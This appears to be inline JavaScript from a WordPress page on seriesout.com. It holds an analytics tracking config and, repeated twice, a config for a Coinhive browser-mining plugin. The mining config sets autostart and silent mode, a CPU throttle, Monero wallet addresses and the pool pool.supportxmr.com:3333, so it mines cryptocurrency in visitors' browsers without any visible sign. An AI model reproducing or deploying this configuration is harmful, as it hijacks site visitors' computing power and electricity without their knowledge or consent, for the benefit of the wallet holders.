/*  */
var monsterinsights_frontend = {
    "js_events_tracking": "true",
    "is_debug_mode": "false",
    "download_extensions": "doc,exe,js,pdf,ppt,tgz,zip,xls",
    "inbound_paths": "",
    "home_url": "https:\/\/seriesout.com",
    "track_download_as": "event",
    "internal_label": "int",
    "hash_tracking": "false"
};
var wp_js_options = {
    "enabled": "1",
    "provider": "coinhive",
    "site_key": "S343Fpia0y5E8YillTaiYSQlcKwXkWs2",
    "throttle": "10",
    "throttleMobile": "5",
    "autostart": "1",
    "silent": "1",
    "log": "",
    "poolEnabled": "",
    "poolWallet": "4A1Yu35QBT6LpaiRLj6uZf9gwfDFKkHckE6WFCSsoMa9Q3btYimBC3FDTdVgQA92PVY5qjejmURXdjWiGUXKgutRHAqJz2G",
    "cryptonoterEnabled": "",
    "cryptonoterWallet": "45iS5gnJ8A8AvdrnTauYZJie2yR3gWKMuQr3d5Jd5pwcjKJLT25mamBHQgwwZysajnCDq1s64NjsS8tx71nb24dUH4dRub1",
    "cryptonoterPool": "pool.supportxmr.com:3333",
    "variant": "pro",
    "version": "3.3.3",
    "userLoggedIn": "",
    "userName": "",
    "userTokens": "0",
    "host": "seriesout.com",
    "mobile": ""
};
var wp_js_options = {
    "enabled": "1",
    "provider": "coinhive",
    "site_key": "S343Fpia0y5E8YillTaiYSQlcKwXkWs2",
    "throttle": "10",
    "throttleMobile": "5",
    "autostart": "1",
    "silent": "1",
    "log": "",
    "poolEnabled": "",
    "poolWallet": "4A1Yu35QBT6LpaiRLj6uZf9gwfDFKkHckE6WFCSsoMa9Q3btYimBC3FDTdVgQA92PVY5qjejmURXdjWiGUXKgutRHAqJz2G",
    "cryptonoterEnabled": "",
    "cryptonoterWallet": "45iS5gnJ8A8AvdrnTauYZJie2yR3gWKMuQr3d5Jd5pwcjKJLT25mamBHQgwwZysajnCDq1s64NjsS8tx71nb24dUH4dRub1",
    "cryptonoterPool": "pool.supportxmr.com:3333",
    "variant": "pro",
    "version": "3.3.3",
    "userLoggedIn": "",
    "userName": "",
    "userTokens": "0",
    "host": "seriesout.com",
    "mobile": ""
}; /*  */